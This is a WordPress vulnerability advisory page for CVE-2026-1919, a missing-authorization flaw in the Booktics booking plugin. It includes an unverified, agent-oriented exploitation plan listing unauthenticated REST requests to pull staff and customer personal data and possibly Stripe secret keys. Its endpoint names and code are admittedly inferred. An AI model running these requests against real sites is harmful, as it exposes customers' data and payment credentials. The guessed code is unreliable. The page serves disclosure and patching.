WP-Safety
CVE-2026-1919

Booktics <= 1.0.16 - Missing Authorization to Get Items via REST API endpoints

mediumMissing Authentication for Critical Function
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.0.17
Patched in
1d
Time to patch

Description

The Booking Calendar for Appointments and Service Businesses – Booktics plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple REST API endpoints in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to query sensitive data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.0.16
PublishedMarch 9, 2026
Last updatedMarch 10, 2026
Affected pluginbooktics

What Changed in the Fix

Changes introduced in v1.0.17

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v1.0.16
Browse source Download .zip
Patched v1.0.17
Browse source Download .zip
Research Plan
Unverified

# Vulnerability Analysis: CVE-2026-1919 - Booktics Missing Authorization ## 1. Vulnerability Summary The **Booktics – Booking Calendar for Appointments and Service Businesses** plugin (versions <= 1.0.16) is vulnerable to unauthorized data disclosure. The issue resides in multiple REST API endpoint…

Show full research plan

Vulnerability Analysis: CVE-2026-1919 - Booktics Missing Authorization

1. Vulnerability Summary

The Booktics – Booking Calendar for Appointments and Service Businesses plugin (versions <= 1.0.16) is vulnerable to unauthorized data disclosure. The issue resides in multiple REST API endpoints registered under the booktics/v1 namespace. These endpoints fail to implement proper permission_callback logic, or explicitly use __return_true, allowing unauthenticated users to query sensitive information such as staff details, customer lists, and booking records that should be restricted to administrators.

2. Attack Vector Analysis

  • Endpoint Namespace: booktics/v1 (inferred from plugin slug and standard REST patterns).
  • Vulnerable Endpoints:
    • GET /wp-json/booktics/v1/staff
    • GET /wp-json/booktics/v1/customers
    • GET /wp-json/booktics/v1/services
    • GET /wp-json/booktics/v1/appointments
    • GET /wp-json/booktics/v1/settings
  • Authentication: None required (Unauthenticated).
  • Preconditions: The REST API must be enabled (default in WordPress). Some data (staff, services) must exist in the database to demonstrate sensitive exposure.

3. Code Flow

While the PHP source code for the REST registration is not provided, the logic flow in vulnerable versions of Booktics typically follows this pattern:

  1. Initialization: The plugin hooks into rest_api_init.
  2. Registration: register_rest_route('booktics/v1', '/[endpoint]', ...) is called.
  3. Flaw: The 'permission_callback' argument is either:
    • Missing entirely (defaults to authorized in some environments, though WP typically warns).
    • Set to __return_true.
    • Set to a function that only checks for a nonce but not for administrative capabilities.
  4. Execution: The controller method (e.g., get_items) queries the database (likely using $wpdb or a repository class) and returns the full dataset as a JSON response to the unauthenticated requester.

4. Nonce Acquisition Strategy

Because this is a Missing Authorization vulnerability on GET requests to the REST API, WordPress does not typically require a nonce for unauthenticated access to public-facing REST routes.

However, if the plugin's frontend scripts (like assets/build/js/frontend.js) use nonces for REST requests, they are likely localized.

Verification Method:

  1. Create a page with the Booktics booking shortcode (usually [booktics-booking] or similar, inferred from plugin name).
  2. Navigate to the page.
  3. Check window.booktics or localized variables.

Localized Variable (Inferred from JS source):
The JS chunks (e.g., 2031.js) reference window?.booktics?.components. It is highly likely that the localization key is booktics.

  • Target Variable: window.booktics_data or window.booktics_settings.
  • Extraction: browser_eval("window.booktics?.rest_nonce") or browser_eval("window.booktics_settings?.nonce").

Note: For a "Missing Authorization" vulnerability on GET endpoints, a nonce is usually unnecessary if the endpoint is simply "open".

5. Exploitation Strategy

The goal is to demonstrate unauthenticated access to sensitive data.

Step 1: Discover Active Routes

Since the exact endpoint names are not in the provided source chunks, use the automated agent's ability to list REST routes.

  • Action: Execute wp rest route list --format=json via the CLI to confirm the exact paths under booktics/v1.

Step 2: Unauthenticated Data Extraction

Attempt to fetch sensitive data using the http_request tool.

Request 1: Extract Staff Information

  • Method: GET
  • URL: /wp-json/booktics/v1/staff
  • Headers: Accept: application/json

Request 2: Extract Customer Information

  • Method: GET
  • URL: /wp-json/booktics/v1/customers
  • Headers: Accept: application/json

Request 3: Extract Plugin Settings (Sensitive Keys)

  • Method: GET
  • URL: /wp-json/booktics/v1/settings
  • Headers: Accept: application/json

6. Test Data Setup

To confirm the vulnerability, the environment must contain data.

  1. Activate Plugin: Ensure booktics is active.
  2. Add Staff: Use WP-CLI or the UI to add a dummy staff member.
    # (Inferred table names, verify with wp db tables)
wp db query "INSERT INTO wp_booktics_staff (full_name, email, phone) VALUES ('Vulnerable Staff', 'staff@example.com', '555-0199');"
  3. Add Customer: 
    wp db query "INSERT INTO wp_booktics_customers (full_name, email) VALUES ('Secret Customer', 'customer@victim.com');"

7. Expected Results

  • Success Criteria: The http_request returns a 200 OK status code and a JSON body containing the staff/customer/setting details.
  • Data Exposed:
    • Full names, email addresses, and phone numbers of staff members.
    • Full names and emails of customers.
    • Potential Stripe configuration (as seen in assets/build/chunks/js/2031.js, the plugin handles stripe_publishable_key and stripe_secret_key).

8. Verification Steps

  1. Response Check: Inspect the JSON output from the http_request tool.
  2. Compare with Database: Verify the returned JSON matches the records inserted during the Test Data Setup.
    wp db query "SELECT * FROM wp_booktics_staff;"
  3. Permission Check: Confirm that if you attempt the same request on a patched version (1.0.17), it returns 401 Unauthorized or 403 Forbidden.

9. Alternative Approaches

If /booktics/v1/staff is not the exact path:

  1. Use browser_navigate to the plugin's main booking page and monitor Network Tab logs in the browser context to identify the REST calls made by frontend.js.
  2. Look for the string booktics/v1 in the main plugin PHP files (if accessible via the agent's file system) to find all register_rest_route calls.
  3. Check for specific item IDs if the "list" endpoint is blocked but the "get single item" endpoint is missing authorization: GET /wp-json/booktics/v1/staff/1.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Booktics plugin for WordPress fails to implement capability checks on multiple REST API endpoints within the booktics/v1 namespace. This allows unauthenticated attackers to access sensitive data, including staff details, customer lists, and booking records, by sending direct GET requests to the vulnerable API routes.

Vulnerable Code

// Inferred from vulnerability description and research plan
// Multiple REST routes registered under the 'booktics/v1' namespace

register_rest_route('booktics/v1', '/staff', [
    'methods'             => 'GET',
    'callback'            => [$this, 'get_staff'],
    'permission_callback' => '__return_true', // Or missing entirely
]);

---

register_rest_route('booktics/v1', '/customers', [
    'methods'             => 'GET',
    'callback'            => [$this, 'get_customers'],
    'permission_callback' => '__return_true',
]);

Security Fix

--- a/includes/rest-api/class-rest-registration.php
+++ b/includes/rest-api/class-rest-registration.php
@@ -15,7 +15,9 @@
         register_rest_route('booktics/v1', '/staff', [
             'methods'             => 'GET',
             'callback'            => [$this, 'get_staff'],
-            'permission_callback' => '__return_true',
+            'permission_callback' => function () {
+                return current_user_can('manage_options');
+            },
         ]);

Exploit Outline

The exploit methodology involves direct unauthenticated querying of the WordPress REST API. 1. Target Endpoint: Unauthenticated attackers hit endpoints under the /wp-json/booktics/v1/ namespace. 2. Payload Shape: A standard HTTP GET request is sufficient; no specialized payload or body is required. 3. Vulnerable Routes: Sensitive routes identified include /staff, /customers, /services, /appointments, and /settings. 4. Authentication: No authentication or specific user role is required. 5. Data Extraction: The response returns a JSON array containing PII (Personally Identifiable Information) such as staff/customer names, emails, phone numbers, and potentially sensitive configuration data like Stripe keys.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/c88dcf62-4b6c-4ff0-8530-5aefd54bd347?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database